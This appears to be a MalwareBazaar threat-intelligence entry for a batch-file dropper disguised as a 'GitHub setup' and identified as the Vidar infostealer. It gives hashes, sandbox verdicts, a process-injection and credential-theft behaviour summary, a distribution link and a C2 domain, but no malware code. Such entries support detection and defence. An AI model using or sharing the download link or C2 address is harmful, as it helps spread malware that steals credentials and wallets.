MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Vidar


Vendor detections: 10


Intelligence 10 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6
SHA3-384 hash: a8d9159604c94fdeae2c12b401394c41859cc9173128f5582fc2a539796940337349989f597112c4ed1b4b8526610b92
SHA1 hash: 93f5cb4fce1ba897c89f93c35b9601828c8aeb4a
MD5 hash: a836bb725b25ab5cd4805c8e1e94f66a
humanhash: spring-network-saturn-one
File name:ɢɪᴛнᴜʙ seᴛᴜр.bat
Download: download sample
Signature Vidar
Create hunting rule
File size:567 bytes
First seen:2025-05-19 21:58:41 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/x-msdos-batch
ssdeep 12:w7Rf6R0t87kZAt2rHR9IbEOONsyIVO98JGz5lX6p5MujTj/39JOwa0:w7RfTJZAt2DR9lOOSk7z55tQtvZ
TLSH T12DF0813F504970550B7D8720CA185486F4094BCF5995DA5774A0F59DBF752012AEECCD
Magika batch
Reporter aachum
Tags:bat vidar


Avatar
iamaachum
https://outmertupw.xyz/SPy2KC?store=MATLAB&src= => https://www.mediafire.com/file/rswbaet2iwdk8s4/%C9%A2%C9%AA%E1%B4%9B%D0%BD%E1%B4%9C%CA%99+se%E1%B4%9B%E1%B4%9C%D1%80.bat/file

Vidar C2: https://d3.7.4t.com/

Intelligence

File Origin
# of uploads :
1
# of downloads :
171
Origin country :
ES ES
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
ɢɪᴛнᴜʙ seᴛᴜр.bat
Verdict:
Malicious activity
Analysis date:
2025-05-19 22:00:29 UTC
Tags:
loader
Link:
https://app.any.run/tasks/381e439d-6fec-4c4d-a351-317f7df081b5

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.Heur.BZC.MNT.Boxter.928.38BCA524.19511.735.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.1%
Link:
https://cyber-fortress.com/docs/result/index.php?id=682ba9b5c28c67d666421fa0
Tags:
vmdetect shell virus sage
Result
Verdict:
Suspicious
Maliciousness:

Behaviour
Searching for the window
Running batch commands
Launching a process
Сreating synchronization primitives
Connection attempt
Sending an HTTP GET request
Creating a file
Creating a process from a recently created file
Creating a window
Creating a process with a hidden window
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
cmd dropper fingerprint installer lolbin opendir opendir overlay packed powershell
Link:
https://www.filescan.io/uploads/682ba9b6bff72ff46b6674c5/reports/90172977-3bd8-41d6-9ff9-8205d59a17b0/overview
Result
Threat name:
Vidar
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1694374
Signature
.NET source code contains process injector
.NET source code references suspicious native API functions
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Searches for specific processes (likely to inject)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious Invoke-WebRequest Execution
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Powershell decode and execute
Yara detected Vidar stealer
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1694374 Sample: #U0262#U026a#U1d1b#U043d#U1... Startdate: 19/05/2025 Architecture: WINDOWS Score: 100 133 d3.7.4t.com 2->133 135 www.google.com 2->135 137 3 other IPs or domains 2->137 157 Suricata IDS alerts for network traffic 2->157 159 Malicious sample detected (through community Yara rule) 2->159 161 Multi AV Scanner detection for submitted file 2->161 163 7 other signatures 2->163 14 cmd.exe 1 2->14         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 171 Suspicious powershell command line found 14->171 20 photoshop-v2.exe 2 14->20         started        23 cmd.exe 1 14->23         started        25 powershell.exe 14 17 14->25         started        28 conhost.exe 14->28         started        131 127.0.0.1 unknown unknown 17->131 signatures6 process7 dnsIp8 93 C:\Users\user\AppData\...\photoshop-v2.tmp, PE32 20->93 dropped 30 photoshop-v2.tmp 3 4 20->30         started        33 powershell.exe 7 23->33         started        141 185.209.21.111, 49711, 80 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 25->141 95 C:\Users\user\Desktop\photoshop-v2.exe, PE32 25->95 dropped file9 process10 file11 125 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 30->125 dropped 36 photoshop-v2.exe 2 30->36         started        153 Compiles code for process injection (via .Net compiler) 33->153 155 Powershell drops PE file 33->155 signatures12 process13 file14 97 C:\Users\user\AppData\...\photoshop-v2.tmp, PE32 36->97 dropped 39 photoshop-v2.tmp 5 37 36->39         started        process15 file16 99 C:\Users\user\...\mswebprjui.dll (copy), PE32 39->99 dropped 101 C:\Users\user\AppData\...\is-QKTS3.tmp, PE32+ 39->101 dropped 103 C:\Users\user\AppData\...\is-PIPHP.tmp, PE32+ 39->103 dropped 105 62 other files (54 malicious) 39->105 dropped 42 Vecinos.exe 34 39->42         started        process17 dnsIp18 143 d3.7.4t.com 49.13.1.124, 443, 49724, 49725 HETZNER-ASDE Germany 42->143 145 t.me 149.154.167.99, 443, 49723 TELEGRAMRU United Kingdom 42->145 165 Encrypted powershell cmdline option found 42->165 167 Tries to harvest and steal browser information (history, passwords, etc) 42->167 169 Searches for specific processes (likely to inject) 42->169 46 powershell.exe 42->46         started        50 chrome.exe 42->50         started        53 powershell.exe 42->53         started        55 23 other processes 42->55 signatures19 process20 dnsIp21 127 C:\Users\user\AppData\...\q5visnuf.cmdline, Unicode 46->127 dropped 173 Writes to foreign memory regions 46->173 175 Creates a thread in another existing process (thread injection) 46->175 57 csc.exe 46->57         started        60 conhost.exe 46->60         started        139 192.168.2.4, 138, 443, 49360 unknown unknown 50->139 62 chrome.exe 50->62         started        129 C:\Users\user\AppData\Local\...\dsrwbiul.0.cs, Unicode 53->129 dropped 65 csc.exe 53->65         started        67 conhost.exe 53->67         started        69 csc.exe 55->69         started        71 csc.exe 55->71         started        73 csc.exe 55->73         started        75 19 other processes 55->75 file22 signatures23 process24 dnsIp25 107 C:\Users\user\AppData\Local\...\q5visnuf.dll, PE32 57->107 dropped 77 cvtres.exe 57->77         started        147 apis.google.com 62->147 149 www.google.com 142.250.72.164, 443, 49735, 49739 GOOGLEUS United States 62->149 151 3 other IPs or domains 62->151 109 C:\Users\user\AppData\Local\...\dsrwbiul.dll, PE32 65->109 dropped 111 C:\Users\user\AppData\Local\...\tsaw332i.dll, PE32 69->111 dropped 79 cvtres.exe 69->79         started        113 C:\Users\user\AppData\Local\...\lqiuiqsj.dll, PE32 71->113 dropped 81 cvtres.exe 71->81         started        115 C:\Users\user\AppData\Local\...\kqbsagdu.dll, PE32 73->115 dropped 83 cvtres.exe 73->83         started        117 C:\Users\user\AppData\Local\...\zk3hvena.dll, PE32 75->117 dropped 119 C:\Users\user\AppData\Local\...\tgb3bhd3.dll, PE32 75->119 dropped 121 C:\Users\user\AppData\Local\...\oguw5d0g.dll, PE32 75->121 dropped 123 5 other files (none is malicious) 75->123 dropped 85 cvtres.exe 75->85         started        87 cvtres.exe 75->87         started        89 cvtres.exe 75->89         started        91 5 other processes 75->91 file26 process27
Score:
5%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6/
Threat name:
Script-BAT.Packed.Boxter
Create hunting rule
Status:
Malicious
First seen:
2025-05-19 21:59:13 UTC
File Type:
Text (Batch)
AV detection:
9 of 24 (37.50%)
Threat level:
  1/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ewvmzs4yijj5ghrgclzaqhakl4trqjduukp743fqhuryn3sm5dda._file
Result
Malware family:
vidar
Create hunting rule
Score:
  10/10
Tags:
family:vidar credential_access defense_evasion discovery execution spyware stealer
Link:
https://tria.ge/reports/250519-1v56kazpz5/
Behaviour
Checks processor information in registry
Delays execution with timeout.exe
Enumerates system info in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Obfuscated Files or Information: Command Obfuscation
Checks computer location settings
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Uses browser remote debugging
Detect Vidar Stealer
Vidar
Vidar family
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Vidar

Batch (bat) bat 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6

(this sample)

Vidar

Executable exe 6a31c17b7e29889a94709e13de77d2726ad08f8876c12b9d7f3694543b748f02

  
Link
https://tria.ge/250519-1rl9aadr2x/behavioral1
  
Delivery method
Distributed via web download
  
Dropping
SHA256 6a31c17b7e29889a94709e13de77d2726ad08f8876c12b9d7f3694543b748f02
  
Dropping
MD5 9e71224548ec0425d558e58408912a3f

Comments